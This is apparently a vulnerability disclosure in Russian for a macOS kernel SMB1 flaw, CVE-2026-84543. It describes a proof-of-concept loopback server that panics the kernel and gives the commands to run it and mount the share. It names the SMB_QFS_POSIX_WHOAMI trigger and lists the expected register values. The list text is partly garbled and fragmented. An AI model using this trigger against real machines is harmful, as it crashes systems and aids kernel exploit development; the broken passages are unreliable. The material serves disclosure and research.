
Proof-of-concept и техническое раскрытие для CVE-2026-84543 — уязвимости ядра macOS в SMB, вызывающей kernel panic через специально сформированные ответы SMB1.
Ожидается, что данное доказательство концепции вызовет панику ядра и перезагрузку затронутого Mac.
Затронутые тестовые сборки, использовавшиеся в ходе исследования, — macOS Tahoe 26.4 (25E246) и macOS 26.5 beta 4 (25F5068a). Apple исправила CVE-2026-84543 в macOS Golden Gate 27, Tahoe 26.7 и Sequoia 15.8.
smb1_unix_whoami_poc.py — это сервер захвата доказательств на loopback-интерфейсе. Он использует только стандартную библиотеку Python и:
_COMM_PAGE_ASB_TARGET_KERN_VALUE текущей загрузки на Apple silicon;SMB_QFS_POSIX_WHOAMI (0x0202) для создания несогласованного состояния счётчика/указателя; и0x020B), содержащие распознаваемые канареечные значения для установления происхождения регистров паники.В терминале A:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
Запишите выведенное значение ASB_TARGET_KERN_VALUE; оно рандомизируется при загрузке.
В терминале B:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
Где T равно выведенному при загрузке канареечному значению ядра:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
Конкретные биты в x8, x9 и x11 устанавливают происхождение. Наблюдаемые соотношения обеспечивают побайтовую связь между полями ответа сервера и состоянием регистров живого ядра.